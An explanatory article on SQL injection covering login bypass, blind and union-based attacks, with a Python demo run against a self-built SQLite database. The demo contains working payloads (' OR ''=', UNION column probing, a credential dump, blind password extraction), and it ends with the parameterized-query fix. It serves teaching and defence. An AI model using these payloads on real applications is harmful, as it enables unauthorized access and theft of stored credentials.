SQL injection is an attack technique used to compromise the security of a Web application that constructs SQL statements from user-supplied data. Structured Query Language (SQL) is a specialized language for working with databases through statements and queries. SQL is an ANSI and ISO standard, so it is currently the most widely used language for database processing and is employed by the majority of modern Web applications. Web applications commonly embed user data in SQL statements in order to build dynamically generated pages. When a Web application fails to correctly validate or escape that user data, the attacker can change the structure of the underlying SQL statement. If the attacker manages to change the statement, the injected SQL executes with the privileges of the component that issued it, i.e. the database account used by the Web application and, on the database server, whatever that server process is allowed to do. The result of this attack technique can be complete control over the database and, in some configurations, execution of commands on the underlying system.

An example is an authentication Web application that contains the following code to build the SQL statement:

    String SQLQuery = "SELECT Username FROM Users WHERE Username = '" + username + "' AND Password = '" + password + "'";

In this code the programmer takes the user data from the authentication form and inserts it directly into the SQL statement (via the variables username and password). Suppose now that the attacker enters the following into the authentication form:

User name: ' OR ''='
Password: ' OR ''='

The resulting SQL statement then looks like this:

SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''

Instead of comparing the submitted values with the data in the Users table, the statement now compares the empty string '' with the empty string '', which is always true. Because AND binds more tightly than OR, the WHERE clause reads (Username = '') OR (''='' AND Password = '') OR (''=''), and the last term alone satisfies it for every row. The statement therefore returns every row of Users, and the attacker is logged in as the first user in the table.

Most often, the most effective method of detecting SQL injection vulnerabilities is manual testing: examining the various application inputs and inserting special characters such as the single quote. Since working with databases often produces feedback in the form of a Web page containing the error message, a potential attacker can roughly determine the syntax of the SQL statement and the type of database behind it, and then craft the injection accordingly. When developing a Web application, special attention should therefore be paid to how much detail the error page contains, so that it does not reveal more than necessary. A generic error page does not remove the vulnerability; it only removes one source of feedback for the attacker.

In general, two types of SQL injection attack are distinguished: blind and normal SQL injection. Blind SQL injection is the counterpart of the situation discussed above in connection with manual testing: the server returns neither a detailed error description nor the query results, only a generic page, so the attacker learns nothing directly from the response. Instead, the attacker submits conditions that are deliberately true or false as the value of a specific parameter and infers the content of the database from the resulting difference in the application's behaviour (for example, whether a page is displayed or not).

Normal SQL injection (also called union-based) uses a UNION SELECT statement as the parameter value, so that the attacker can discover whether the results of an attacker-chosen query can be appended to the results of the original one.

The success of this attack depends on the number of columns returned by the original query, because both sides of a UNION must return the same number of columns, so the attacker first has to determine that count (for instance by adding NULL columns one at a time until the error disappears). Once the count is known, the attacker can read arbitrary tables through the UNION and obtains an insight into the database.
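The following Python program is added here as an illustration and is not code from the original article. It reproduces the login bypass from the example above and both attack classes just described (boolean-based blind extraction and union-based column counting) against an in-memory SQLite database, and shows the parameterized query that removes the vulnerability. The Users table with its extra Email column, the sample rows, the hypothetical profile page (profile_vulnerable) and the attack helper functions are all constructed for the demonstration; the comment syntax (--) and substr() are SQLite's, so payloads need adjusting for other engines (MySQL, for instance, requires a space after --).

```python
import sqlite3
import string

# Constructed sample rows for this demonstration; not data from the article.
USERS = [("alice", "s3cret", "alice@example.com"),
         ("bob", "hunter2", "bob@example.com")]


def make_db():
    """In-memory SQLite database with a Users table like the one in the text."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT, Email TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The article's concatenated login query: user input becomes SQL syntax."""
    sql = ("SELECT Username FROM Users WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same query with bound parameters: input is compared as data only."""
    sql = "SELECT Username FROM Users WHERE Username = ? AND Password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def profile_vulnerable(conn, name):
    """Hypothetical profile page, also built by concatenation. Returns the rows,
    or None when the database raised an error: the server shows only a generic
    error page, so the attacker sees no SQL detail, just 'error' vs 'no error'."""
    sql = "SELECT Username, Email FROM Users WHERE Username = '" + name + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def union_column_count(conn, max_cols=10):
    """Union-based probing: add NULL columns until UNION SELECT stops failing."""
    for n in range(1, max_cols + 1):
        payload = "x' UNION SELECT " + ", ".join(["NULL"] * n) + "--"
        if profile_vulnerable(conn, payload) is not None:
            return n
    return None


def union_dump_passwords(conn, ncols):
    """With the column count known, pull Username/Password through the UNION."""
    cols = ["Username", "Password"] + ["NULL"] * (ncols - 2)
    payload = "x' UNION SELECT " + ", ".join(cols) + " FROM Users--"
    rows = profile_vulnerable(conn, payload)
    return sorted(rows) if rows else []


def blind_extract_password(conn, user,
                           charset=string.ascii_lowercase + string.digits):
    """Boolean-based blind extraction: every request asks one true/false
    question, and the only signal is whether the page shows any rows."""
    found = ""
    while True:
        for ch in charset:
            probe = ("x' OR (SELECT substr(Password, " + str(len(found) + 1)
                     + ", 1) FROM Users WHERE Username = '" + user + "') = '"
                     + ch + "'--")
            if profile_vulnerable(conn, probe):   # rows shown => condition true
                found += ch
                break
        else:
            return found   # no candidate matched: end of the password


if __name__ == "__main__":
    db = make_db()
    payload = "' OR ''='"
    print("vulnerable login:", login_vulnerable(db, payload, payload))  # alice
    print("parameterized login:", login_fixed(db, payload, payload))    # None
    n = union_column_count(db)                                          # 2
    print("columns:", n, "dump:", union_dump_passwords(db, n))
    print("blind:", blind_extract_password(db, "alice"))                # s3cret
```

Two points are worth noting. profile_vulnerable deliberately models the "generic error page" recommended above, yet the union probe still succeeds because it only needs to distinguish an error from a successful query, and the blind loop succeeds without any error at all, one request per candidate character; suppressing error detail slows the attacker down but does not fix the flaw. login_fixed does fix it: with bound parameters the database receives the statement and the values separately, so a quote in the input can never terminate the string literal.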